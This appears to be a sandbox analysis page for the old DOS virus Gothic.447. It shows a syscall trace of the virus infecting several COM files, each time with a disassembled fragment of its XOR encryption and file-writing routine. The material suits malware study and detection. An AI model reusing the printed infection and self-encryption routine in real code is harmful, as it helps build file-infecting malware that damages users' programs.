Sample viewer

vx.netlux.org/Virus.DOS.VCC.Gothic.447

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:02.736357559Z 26 PC: 12e55 | Set disk transfer address
2018-12-17T22:26:02.737908584Z 37 PC: 12e63 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T22:26:02.740024602Z 37 PC: 12e67 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T22:26:02.741748692Z 78 PC: 12eb3 | Find first file
2018-12-17T22:26:02.749543624Z 61 PC: 12f75 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:26:02.758073904Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:02.76542221Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:02.767365048Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:02.77363657Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:02.776847Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:02.778588864Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x31
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:02.78155952Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:02.797216086Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:02.806745597Z 79 PC: 12eb3 | Find next file
2018-12-17T22:26:02.810948817Z 61 PC: 12f75 | Open file (Filename = 'PRINT.S')
2018-12-17T22:26:02.820316389Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:02.827906481Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:02.829552345Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:02.831631606Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:02.834557991Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:02.836182387Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x47
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:02.839648386Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:02.849168392Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:02.858360386Z 79 PC: 12eb3 | Find next file
2018-12-17T22:26:02.862220049Z 61 PC: 12f75 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:26:02.869981572Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:02.877061596Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:02.879381749Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:02.881455361Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:02.884913233Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:02.888137859Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x4d
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:02.890715202Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:02.894730311Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:02.904261897Z 79 PC: 12eb3 | Find next file
2018-12-17T22:26:02.907342291Z 61 PC: 12f75 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:26:02.914868426Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:02.922550501Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:02.924637332Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:02.926258531Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:02.929483989Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:02.931776409Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x4d
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:02.934392568Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:02.943568773Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:02.953160283Z 79 PC: 12eb3 | Find next file
2018-12-17T22:26:02.956549465Z 61 PC: 12f75 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:26:02.965059762Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:02.973167268Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:02.9749162Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:02.976905694Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:02.981040977Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:02.983293688Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x52
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:02.986261228Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:02.990043944Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:02.999155413Z 79 PC: 12eb3 | Find next file
2018-12-17T22:26:03.002541504Z 61 PC: 12f75 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:26:03.010470039Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:03.01884019Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:03.020705011Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:03.022290846Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:03.025806313Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:03.027477083Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x57
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:03.031334572Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:03.036824986Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:03.045252972Z 79 PC: 12eb3 | Find next file
2018-12-17T22:26:03.048382665Z 61 PC: 12f75 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:26:03.056859656Z 63 PC: 12f84 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T22:26:03.065345059Z 66 PC: 12f93 | Move file pointer
2018-12-17T22:26:03.067286526Z 66 PC: 12fa2 | Move file pointer
2018-12-17T22:26:03.069763075Z 64 PC: 12fae | Write file or device (Write 4 bytes on handle 5)
2018-12-17T22:26:03.072726879Z 66 PC: 12fba | Move file pointer
2018-12-17T22:26:03.074152407Z 44 PC: 12fbe | Get time 0x12fbe: mov byte ptr [bp + 0x1bf], dl
0x12fc2: call 0x12fd8
0x12fc5: mov ah, 0x40
0x12fc7: mov cx, 0x1bf
0x12fca: lea dx, word ptr [bp + 6]
0x12fce: int 0x21
0x12fd0: call 0x12fd8
0x12fd3: mov ah, 0x3e
0x12fd5: int 0x21
0x12fd7: ret
0x12fd8: lea si, word ptr [bp + 0x20]
0x12fdc: mov cx, 0x180
0x12fdf: xor byte ptr [si], 0x57
0x12fe2: inc si
0x12fe3: dec cx
0x12fe4: jne 0x12fdf
0x12fe6: ret
0x12fe7: add word ptr [bx], di
0x12fe9: aas
0x12fea: aas
2018-12-17T22:26:03.076798894Z 64 PC: 12fd0 | Write file or device (Write 447 bytes on handle 5)
2018-12-17T22:26:03.086034478Z 62 PC: 12fd7 | Close file
2018-12-17T22:26:03.104291934Z 26 PC: 12ecd | Set disk transfer address
2018-12-17T22:26:03.10568232Z 9 PC: 12edf | Display string (String= ' Someone is at the door ')